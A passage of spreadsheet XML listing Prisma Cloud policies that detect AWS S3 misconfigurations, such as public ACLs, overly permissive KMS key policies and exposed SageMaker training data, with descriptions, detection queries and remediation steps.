          <t>true</t>
        </is>
      </c>
      <c r="AK2085" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2086">
      <c r="A2086" t="inlineStr"/>
      <c r="B2086" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2086" s="2" t="inlineStr"/>
      <c r="D2086" t="inlineStr"/>
      <c r="E2086" t="inlineStr"/>
      <c r="F2086" t="inlineStr"/>
      <c r="G2086" t="b">
        <v>1</v>
      </c>
      <c r="H20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86" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2086" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2086" t="inlineStr">
        <is>
          <t>AI data exposure risk due to S3 bucket used for SageMaker training job accessible to unmonitored cloud accounts</t>
        </is>
      </c>
      <c r="L2086" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2086" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2086" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2086" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2086" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2086" t="inlineStr"/>
      <c r="R2086" t="inlineStr"/>
      <c r="S2086" t="inlineStr"/>
      <c r="T2086" t="b">
        <v>0</v>
      </c>
      <c r="U2086" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2086" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2086" t="inlineStr">
        <is>
          <t>This policy identifies the potential risk of data breaches due to AWS S3 buckets containing AWS SageMaker training job data not configured with the access log feature and accessible by unmonitored cloud accounts.
Unmonitored cloud accounts are entities with S3 bucket access, allowing read/write permissions for Cloud Accounts not monitored by Prisma Cloud. The combination of AWS SageMaker training job data in these S3 buckets and access by unmonitored cloud accounts can lead to leaks of SageMaker training data or models, resulting in potential breaches.S3 buckets containing SageMaker training data should be monitored by the access log feature to track events from unmonitored cloud accounts.
Immediate action is required to configure the access log feature for the reported S3 bucket and enforce stricter access methods, as it contains SageMaker training data.</t>
        </is>
      </c>
      <c r="X2086" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
1. Login to the AWS Console and navigate to the 'S3' service.
2. Click on the the S3 bucket that was reported.
3. Click on the 'Properties' tab.
4. Under the 'Server access logging' section, click on 'Edit’, select 'Enable' option and provide the required details. 
[MISCONFIGURATION]
1. Log in to the AWS Console
2. Navigate to the 'S3' service
3. Click on the reported S3 bucket
4. Click on the 'Permissions' tab
5. Navigate to the 'Access control list (ACL)' section and Click on the 'Edit'
6. Under 'Access for other AWS accounts', Add the Cloud Accounts that are monitored by Prisma Cloud
7. Click on 'Save changes'</t>
        </is>
      </c>
      <c r="Y2086" t="inlineStr"/>
      <c r="Z2086" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name = (('AWS S3 bucket used for storing AWS Sagemaker training job output' or 'AWS S3 bucket is utilized for AWS Sagemaker training job data') and ('AWS S3 bucket accessible to unmonitored cloud accounts'))</t>
        </is>
      </c>
      <c r="AA2086" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2086" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:44</t>
        </is>
      </c>
      <c r="AC2086" t="inlineStr"/>
      <c r="AD2086" t="b">
        <v>1</v>
      </c>
      <c r="AE2086" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2086" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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86" t="inlineStr">
        <is>
          <t>7ddaeffe-d14e-4134-9a32-65d27dd6e52a</t>
        </is>
      </c>
      <c r="AI2086" t="inlineStr">
        <is>
          <t>6ba00ccd-fd36-4dbf-b5eb-8ac3d3ae2c3c</t>
        </is>
      </c>
      <c r="AJ2086" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2086" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2087">
      <c r="A2087" t="inlineStr"/>
      <c r="B2087" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2087" s="2" t="inlineStr"/>
      <c r="D2087" t="inlineStr"/>
      <c r="E2087" t="inlineStr"/>
      <c r="F2087" t="inlineStr"/>
      <c r="G2087" t="b">
        <v>1</v>
      </c>
      <c r="H20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87" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2087" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2087" t="inlineStr">
        <is>
          <t>AI data exposure risk due to S3 bucket linked to SageMaker training job not configured with secure data transport policy</t>
        </is>
      </c>
      <c r="L2087" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2087" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2087" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2087" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2087" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2087" t="inlineStr"/>
      <c r="R2087" t="inlineStr"/>
      <c r="S2087" t="inlineStr"/>
      <c r="T2087" t="b">
        <v>0</v>
      </c>
      <c r="U2087" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2087" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2087" t="inlineStr">
        <is>
          <t>This policy identifies the potential risk of AI data exposure due to an AWS S3 bucket used for SageMaker training jobs that is not configured with a secure data transport policy.
When an S3 bucket used for SageMaker training jobs lacks a secure data transport configuration, the risk of unauthorized access and data exposure increases. A secure data transport policy ensures that REST API access to your S3 bucket occurs over HTTPS, rejecting any requests made over HTTP.
Immediate attention is required to configure the secure transfer feature for the reported S3 bucket and enforce stricter access controls. This will help protect against unauthorized access and ensure the security of your data.</t>
        </is>
      </c>
      <c r="X2087" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
1. Sign into the AWS console
2. Navigate to Amazon S3 Dashboard
3. Click on 'Buckets' (Left Panel)
4. Choose the reported S3 bucket
5. On 'Permissions' tab, Click on 'Bucket Policy'
6. Add a bucket policy that explicitly denies (Effect: Deny) all access (Action: s3:) from anybody who browses (Principal: ) to Amazon S3 objects within an Amazon S3 bucket if they are not accessed through HTTPS (aws:SecureTransport: false). Below is the sample policy:
{
 'Sid': 'ForceSSLOnlyAccess',
  'Effect': 'Deny',
 'Principal': '*',
 'Action': 's3:GetObject',
 'Resource': 'arn:aws:s3:::bucket_name/*',
 'Condition': {
      'Bool': {
     'aws:SecureTransport': 'false'
    }
 }
}</t>
        </is>
      </c>
      <c r="Y2087" t="inlineStr"/>
      <c r="Z2087" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name = (('AWS S3 bucket used for storing AWS Sagemaker training job output' or 'AWS S3 bucket is utilized for AWS Sagemaker training job data') and ('AWS S3 bucket not configured with secure data transport policy'))</t>
        </is>
      </c>
      <c r="AA2087" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2087" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:43</t>
        </is>
      </c>
      <c r="AC2087" t="inlineStr"/>
      <c r="AD2087" t="b">
        <v>1</v>
      </c>
      <c r="AE2087" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2087" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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87" t="inlineStr">
        <is>
          <t>d4bc657d-ebfd-4676-9946-87a7859882a6</t>
        </is>
      </c>
      <c r="AI2087" t="inlineStr">
        <is>
          <t>4c463ba7-cc2f-4d57-86bf-dd254f76b360</t>
        </is>
      </c>
      <c r="AJ2087" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2087" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2088">
      <c r="A2088" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, DORA, TX-RAMP Level 1, SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2088" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2088" s="2" t="inlineStr"/>
      <c r="D2088" t="inlineStr"/>
      <c r="E2088" t="inlineStr"/>
      <c r="F2088" t="inlineStr"/>
      <c r="G2088" t="b">
        <v>1</v>
      </c>
      <c r="H20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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2088" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2088" t="inlineStr">
        <is>
          <t>AWS CloudTrail S3 bucket encrypted with Customer Managed Key (CMK) that is scheduled for deletion</t>
        </is>
      </c>
      <c r="L2088" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2088" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2088" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2088" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2088" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2088" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2088" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2088" t="inlineStr"/>
      <c r="T2088" t="b">
        <v>0</v>
      </c>
      <c r="U2088" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2088" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2088" t="inlineStr">
        <is>
          <t>This policy identifies AWS CloudTrail S3 buckets encrypted with Customer Managed Key (CMK) that is scheduled for deletion.
CloudTrail logs contain account activity related to actions across your AWS infrastructure. These log files stored in Amazon S3 are encrypted by AWS KMS keys. Deleting keys in AWS KMS that are used by CloudTrail is a common defense evasion technique and could be a potential ransomware attacker activity. After a key is deleted, you can no longer decrypt the data that was encrypted under that key, which helps the attacker to hide their malicious activities.
It is recommended to regularly monitor the key used for encryption to prevent accidental deletion.</t>
        </is>
      </c>
      <c r="X2088" t="inlineStr">
        <is>
          <t>The following steps are recommended to cancel KMS CMKs which are scheduled for deletion used by the S3 bucket
1. Log in to the AWS Console and navigate to the 'S3' service.
2. Click on the S3 bucket reported in the alert.
3. Click on the 'Properties' tab.
4. Under the 'Default encryption' section, click on the KMS key link in 'Encryption key ARN'.
5. Navigate to Key Management Service (KMS).
6. Click on 'Key actions' dropdown.
7. Click on 'Cancel key deletion'.
8. Click on 'Enable'.</t>
        </is>
      </c>
      <c r="Y2088" t="inlineStr"/>
      <c r="Z2088" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-s3api-get-bucket-acl' AND json.rule = (sseAlgorithm contains "aws:kms" or sseAlgorithm contains "aws:kms:dsse") and kmsMasterKeyID exists as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyManager equal ignore case CUSTOMER and keyMetadata.keyState contains PendingDeletion as Y; config from cloud.resource where api.name = 'aws-cloudtrail-describe-trails' as Z; filter '$.X.kmsMasterKeyID contains $.Y.key.keyArn and $.Z.s3BucketName equals $.X.bucketName'; show X;</t>
        </is>
      </c>
      <c r="AA2088" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2088" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2088" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1113</t>
        </is>
      </c>
      <c r="AD2088" t="b">
        <v>1</v>
      </c>
      <c r="AE2088" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2088" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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8" t="inlineStr">
        <is>
          <t>48744a10-f434-4930-b9ff-4cf8903f50ff</t>
        </is>
      </c>
      <c r="AI2088" t="inlineStr">
        <is>
          <t>41e48e40-d886-49c9-b522-2d41dff8b574</t>
        </is>
      </c>
      <c r="AJ2088" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2088" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2089">
      <c r="A2089" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, CSA CCM v4.0.12, HIPAA, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, HIPAA, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, DORA, Telecommunications Security Act - TSA, SOC 2, SOC 2, TX-RAMP Level 1, SOC 2, TX-RAMP Level 1, HIPAA, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2089" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2089" s="2" t="inlineStr"/>
      <c r="D2089" t="inlineStr"/>
      <c r="E2089" t="inlineStr"/>
      <c r="F2089" t="inlineStr"/>
      <c r="G2089" t="b">
        <v>1</v>
      </c>
      <c r="H20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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2089" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2089" t="inlineStr">
        <is>
          <t>AWS S3 bucket encrypted using Customer Managed Key (CMK) with overly permissive policy</t>
        </is>
      </c>
      <c r="L2089" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2089" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2089" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2089" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2089" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2089" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2089" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2089" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2089" t="b">
        <v>0</v>
      </c>
      <c r="U2089" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2089" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2089" t="inlineStr">
        <is>
          <t>This policy identifies Amazon S3 buckets that use Customer Managed Keys (CMKs) for encryption that have a key policy overly permissive. Amazon S3 bucket encryption key overly permissive can result in the exposure of sensitive data and potential compliance violations. As a security best practice, It is recommended to follow the principle of least privilege ensuring that the KMS key policy does not have all the permissions to be able to complete a malicious action.</t>
        </is>
      </c>
      <c r="X2089" t="inlineStr">
        <is>
          <t>The following steps are recommended to add changes to existing key policy of the KMS key used by the S3 bucket
1. Log in to the AWS Console and navigate to the 'S3' service.
2. Click on the S3 bucket reported in the alert.
3. Click on the 'Properties' tab.
4. Under the 'Default encryption' section, click on the KMS key link in 'Encryption key ARN'.
5. Click on the 'Key policy' tab on the navigated KMS key window.
6. Click on 'Edit'.
7. Replace the 'Everyone' grantee (i.e. '*') from the Principal element value with an AWS account ID or an AWS account ARN.
 OR 
Add a Condition clause to the existing policy statement so that the KMS key is restricted.
8. Click on 'Save Changes'.</t>
        </is>
      </c>
      <c r="Y2089" t="inlineStr"/>
      <c r="Z2089" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-s3api-get-bucket-acl' AND json.rule = (sseAlgorithm contains "aws:kms" or sseAlgorithm contains "aws:kms:dsse") and kmsMasterKeyID exists as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyState equals Enabled and keyMetadata.keyManager equals CUSTOMER and policies.default.Statement[?any((Principal.AWS equals * or Principal equals *)and Condition does not exist)] exists as Y; filter '$.X.kmsMasterKeyID contains $.Y.key.keyArn' ; show X;</t>
        </is>
      </c>
      <c r="AA2089" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2089" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2089" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1081</t>
        </is>
      </c>
      <c r="AD2089" t="b">
        <v>1</v>
      </c>
      <c r="AE2089" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2089" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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89" t="inlineStr">
        <is>
          <t>89ef8838-136a-405c-8a72-0edfadcdeadc</t>
        </is>
      </c>
      <c r="AI2089" t="inlineStr">
        <is>
          <t>1236bf26-18d5-4393-885d-e828115f5836</t>
        </is>
      </c>
      <c r="AJ2089" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2089" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2090">
      <c r="A2090" t="inlineStr"/>
      <c r="B2090" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2090" s="2" t="inlineStr"/>
      <c r="D2090" t="inlineStr"/>
      <c r="E2090" t="inlineStr"/>
      <c r="F2090" t="inlineStr"/>
      <c r="G2090" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2090" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2090" t="inlineStr">
        <is>
          <t>Data exposure risk due to sensitive data in AWS S3 bucket that is publicly readable</t>
        </is>
      </c>
      <c r="L2090" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE,DISCOVERY</t>
        </is>
      </c>
      <c r="M2090" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2090" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2090" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2090" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2090" t="inlineStr"/>
      <c r="R2090" t="inlineStr"/>
      <c r="S2090" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2090" t="b">
        <v>0</v>
      </c>
      <c r="U2090" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2090" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2090" t="inlineStr">
        <is>
          <t>This policy identifies potential data exposure risk due to an AWS S3 bucket that is publicly readable and contains sensitive data.
The combination of public access permissions and sensitive data in the storage asset increases the risk of unauthorized access and data exfiltration. Proper access control and data protection measures should be in place to prevent potential compromise of critical data.
Immediate attention is required to enforce stricter access methods for the reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2090"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GET/LIST objects in your S3 bucket. You may also want to specifically limit the 'Principal' ability to perform specific GET/LIST functions, without the wild card.
If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
b. Click on Save changes
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2090" t="inlineStr"/>
      <c r="Z2090" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket publicly readable','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2090" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2090" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:13</t>
        </is>
      </c>
      <c r="AC2090" t="inlineStr"/>
      <c r="AD2090" t="b">
        <v>1</v>
      </c>
      <c r="AE2090" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2090" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>24372546-8b6e-4569-890f-56acddcf3e09</t>
        </is>
      </c>
      <c r="AI2090" t="inlineStr">
        <is>
          <t>bae09219-e321-46b6-b967-631476fa8d8e</t>
        </is>
      </c>
      <c r="AJ2090" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2090" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2091">
      <c r="A2091" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, MLPS 2.0, HIPAA, NIST CSF, NIST CSF v2.0, NIST CSF, APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v9.3 [Deprecated], GDPR, Matt's ATT&amp;ACK, jbrox - GDPR, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, TX-RAMP Level 2, kfirdaus AWS Account-CS, SOC 2, Secure Controls Framework (SCF) - 2024.2, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, Telecommunications Security Act - TSA, SOC 2, ISO 27001:2013, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Brazilian Data Protection Law (LGPD), NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CIS Controls v8, ISO 27001:2013, NIST 800-171 Rev1, CyberSecurity Law of the People's Republic of China, SOC 2, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, SOC 2, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), ISO 27001:2013, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CHC HITRUST CSF v.9.6.0, NIST CSF, PIPEDA, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, HITRUST CSF v.9.6.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, kashan ACSC Information Security Manual (ISM), CSA CCM v3.0.1, MAS TRM 2021, APRA (CPS 234) Information Security, CCPA 2018, ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ACSC Information Security Manual (ISM), NIST 800-171 Rev1, NIST CSF, TX-RAMP Level 2, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Compliance Standard Test Jadempsey, ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, CSA CCM v3.0.1, HIPAA, AWS Well-Architected Framework, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-171 Rev1, Australian Energy Sector Cyber Security Framework (AESCSF), HITRUST CSF v.9.6.0, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2091" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2091" s="2" t="inlineStr"/>
      <c r="D2091" t="n">
        <v>0</v>
      </c>
      <c r="E2091" t="n">
        <v>7</v>
      </c>
      <c r="F2091" t="n">
        <v>0</v>
      </c>
      <c r="G2091" t="b">
        <v>1</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2091" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2091" t="inlineStr">
        <is>
          <t>AWS S3 buckets are accessible to public via ACL</t>
        </is>
      </c>
      <c r="L2091" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2091" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2091" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2091" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2091" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2091" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2091" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2091" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2091" t="b">
        <v>1</v>
      </c>
      <c r="U2091" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2091" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2091" t="inlineStr">
        <is>
          <t>This policy identifies S3 buckets which are publicly accessible via ACL. Amazon S3 often used to store highly sensitive enterprise data and allowing public access to such S3 bucket through ACL would result in sensitive data being compromised. It is highly recommended to disable ACL configuration for all S3 buckets and use resource based policies to allow access to S3 buckets.</t>
        </is>
      </c>
      <c r="X2091" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console
2. Navigate to the 'S3' service
3. Click on the 'S3' resource reported in the alert
4. Click on the 'Permissions'
5. If Access Control List' is set to 'Public' follow below steps
a. Under 'Access Control List', Click on 'Everyone' and uncheck all items
b. Click on Save</t>
        </is>
      </c>
      <c r="Y2091" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 's3:PutBucketPublicAccessBlock' permission. Successful execution enables 'Block public access' setting which blocks the public access for the S3 bucket.",
'impact': 'Disable public access to AWS S3 bucket',
'cliScriptTemplate': 'aws s3api put-public-access-block --bucket $resourceName --public-access-block-configuration "IgnorePublicAcls=true,RestrictPublicBuckets=true"'</t>
        </is>
      </c>
      <c r="Z2091" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-s3api-get-bucket-acl' AND json.rule = "((((acl.grants[?(@.grantee=='AllUsers')] size &gt; 0) or policyStatus.isPublic is true) and publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration does not exist) or ((acl.grants[?(@.grantee=='AllUsers')] size &gt; 0) and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and websiteConfiguration does not exist"</t>
        </is>
      </c>
      <c r="AA2091" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2091" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
